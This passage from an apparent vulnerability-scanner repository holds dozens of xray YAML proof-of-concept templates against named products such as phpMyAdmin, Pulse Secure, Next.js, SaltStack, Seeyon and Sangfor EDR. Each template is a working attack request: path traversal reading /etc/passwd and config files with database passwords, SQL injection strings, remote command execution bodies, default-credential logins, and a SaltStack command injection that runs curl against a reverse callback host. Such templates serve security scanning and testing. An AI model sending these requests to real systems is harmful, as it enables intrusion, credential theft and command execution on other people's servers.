https://www.cnblogs.com/test404/p/7397755.html 19 | Affected Version: maccms8.x 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/metinfo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-file-read 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http/.....///.....///config/config_db.php 10 | expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name") 11 | expression: r0() 12 | detail: 13 | author: amos1 14 | links: 15 | - https://www.cnblogs.com/-qing-/p/10889467.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 10 | follow_redirects: true 11 | expression: response.body.bcontains(b"Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 12 | expression: r0() 13 | detail: 14 | author: betta(https://github.com/betta-cyber) 15 | links: 16 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_next/../../../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 17 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 18 | version: <2.4.1 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /../../../../../../../../windows/win.ini 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 13 | body: | 14 | echo 15 | echo 16 | expr {{r1}} + {{r2}} 2>&1 17 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 18 | expression: r0() 19 | detail: 20 | author: Loneyer 21 | links: 22 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 23 | versions: <= 1.9.6 24 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/node-red-dashboard-file-read-cve-2021-3223.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 10 | expression: response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) 11 | expression: r0() 12 | detail: 13 | author: Print1n(http://print1n.top) 14 | links: 15 | - https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/novnc-url-redirection-cve-2021-3654.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-novnc-url-redirection-cve-2021-3654 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | method: GET 8 | path: "/" 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"noVNC") 12 | r1: 13 | request: 14 | method: GET 15 | path: "//baidu.com/%2f.." 16 | follow_redirects: false 17 | expression: | 18 | response.status == 301 && response.headers["location"] == "//baidu.com/%2f../" 19 | expression: r0() && r1() 20 | detail: 21 | author: txf(https://github.com/tangxiaofeng7) 22 | links: 23 | - https://seclists.org/oss-sec/2021/q3/188 24 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/verify 10 | body: username=admin&password=123 11 | follow_redirects: true 12 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /webapi/v1/system/accountmanage/account 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 12 | expression: r0() 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://blog.csdn.net/DFMASTER/article/details/108547352 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /css_parser.php?css=css_parser.php 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 12 | expression: r0() 13 | detail: 14 | author: 2357000166(https://github.com/2357000166) 15 | links: 16 | - https://www.exploit-db.com/exploits/40211 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/odoo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-odoo-file-read 2 | manual: true 3 | transport: http 4 | rules: 5 | linux0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /base_import/static/etc/passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | win0: 12 | request: 13 | cache: true 14 | method: GET 15 | path: /base_import/static/c:/windows/win.ini 16 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 17 | expression: win0() || linux0() 18 | detail: 19 | author: amos1 20 | links: 21 | - https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /getFavicon?host=baidu.com/? 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.cnvd.org.cn/patchInfo/show/192993 17 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/panabit-gateway-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-gateway-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=panabit 11 | expression: response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm") 12 | expression: r0() 13 | detail: 14 | author: Print1n(https://github.com/Print1n) 15 | links: 16 | - https://max.book118.com/html/2017/0623/117514590.shtm 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/panabit-ixcache-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-ixcache-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=ixcache 11 | expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi") 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - http://forum.panabit.com/thread-10830-1-1.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/pbootcms-database-file-download.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pbootcms-database-file-download 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /data/pbootcms.db 10 | follow_redirects: false 11 | expression: response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS") 12 | expression: r0() 13 | detail: 14 | author: abcRosexyz(https://github.com/abcRosexyz) 15 | links: 16 | - https://www.cnblogs.com/0daybug/p/12786036.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 12 | body: 13 | follow_redirects: false 14 | expression: response.body.bcontains(bytes(md5(string(rand)))) 15 | expression: r0() 16 | detail: 17 | author: 17bdw 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /scripts/setup.php 10 | body: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 11 | follow_redirects: false 12 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | expression: r0() 14 | detail: 15 | author: p0wd3r 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+ 12 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: jinqi 16 | links: 17 | - https://github.com/jinqi520 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: hhdaddy 16 | links: 17 | - https://www.cnblogs.com/Spec/p/10718046.html 18 | Affected Version: "1.7" 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 12 | body: 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 15 | expression: r0() 16 | detail: 17 | author: p0wd3r,buchixifan 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/prometheus-url-redirection-cve-2021-29622.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-prometheus-url-redirection-cve-2021-29622 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /new/newhttps:/baidu.com 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?" 12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: leezp 15 | links: 16 | - https://github.com/jas502n/CVE-2019-11510-1 17 | - https://github.com/projectzeroindia/CVE-2019-11510 18 | Affected Version: 'Pulse Connect Secure: 9.0RX 8.3RX 8.2RX' 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://www.ld-fcw.com/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/qizhi-fortressaircraft-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qizhi-fortressaircraft-unauthorized 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 10 | expression: response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") 11 | expression: r0() 12 | detail: 13 | author: we1x4n(https://we1x4n.com/) 14 | links: 15 | - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /tests/generate.php 10 | follow_redirects: false 11 | expression: 'response.status == 200 && response.body.bcontains(b"Fatal error: Class ''PHPUnit_Framework_TestCase'' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")' 12 | expression: r0() 13 | detail: 14 | author: we1x4n(https://we1x4n.github.io/) 15 | links: 16 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 17 | - https://www.exploit-db.com/exploits/44495/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /%20../web-inf/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.secpulse.com/archives/39144.html 17 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-inputfile-fileread-or-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.secpulse.com/archives/496.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /resin-doc/viewfile/?file=index.jsp 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 17 | - http://0day5.com/archives/1173/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/rockmongo-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rockmongo-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php?action=login.index&host=0 10 | body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 11 | follow_redirects: false 12 | expression: response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0" 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://www.runoob.com/mongodb/working-with-rockmongo.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ruijie-uac-cnvd-2021-14536.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-uac-cnvd-2021-14536 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /login.php 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: jweny(https://github.com/jweny) 15 | links: 16 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/saltstack-cve-2020-16846.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | manual: true 3 | transport: http 4 | set: 5 | reverse: newReverse() 6 | reverseURL: reverse.url 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /run 13 | body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 14 | expression: reverse.wait(5) 15 | expression: r0() 16 | detail: 17 | author: we1x4n(https://we1x4n.com/) 18 | links: 19 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 20 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /main.ehp 10 | body: | 11 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 14 | expression: r0() 15 | detail: 16 | author: sharecast 17 | links: 18 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(1140000, 1144800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /(download)/tmp/1.txt 13 | body: | 14 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 15 | follow_redirects: false 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 17 | expression: r0() 18 | detail: 19 | author: sharecast 20 | links: 21 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui/login.php?user=admin 10 | follow_redirects: false 11 | expression: response.status == 302 && response.body.bcontains(b"/download/edr_installer_") && response.headers["Set-Cookie"] != "" 12 | expression: r0() 13 | detail: 14 | author: hilson 15 | links: 16 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomLowercase(8) 6 | r2: randomLowercase(8) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}} 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 15 | expression: r0() 16 | detail: 17 | author: cookie 18 | links: 19 | - https://edr.sangfor.com.cn/ 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 12 | expression: r0() 13 | detail: 14 | author: MaxSecurity(https://github.com/MaxSecurity) 15 | links: 16 | - https://www.uedbox.com/post/54561/ 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | manual: true 3 | transport: http 4 | set: 5 | rand1: randomInt(200000000, 210000000) 6 | rand2: randomInt(200000000, 210000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /search.php?searchtype=5 13 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 14 | expression: response.body.bcontains(bytes(string(rand1 + rand2))) 15 | expression: r0() 16 | detail: 17 | author: Facker007(https://github.com/Facker007) 18 | links: 19 | - https://www.cnblogs.com/ffx1/p/12653597.html 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-a6-employee-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-a6-employee-info-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | poc10: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 10 | expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") 11 | expression: poc10() 12 | detail: 13 | author: sakura404x 14 | links: 15 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md 16 | version: 致远A6 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-cnvd-2020-62422-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 17 | info: seeyon readfile(CNVD-2020-62422) 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-session-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-session-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll 10 | expression: response.status == 200 && response.body.bcontains(b"\r\n\r\n") 11 | expression: r0() 12 | detail: 13 | author: sakura404x 14 | links: 15 | - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 12 | expression: r0() 13 | detail: 14 | author: canc3s(https://github.com/canc3s) 15 | links: 16 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/shiziyu-cms-apicontroller-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-shiziyu-cms-apicontroller-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 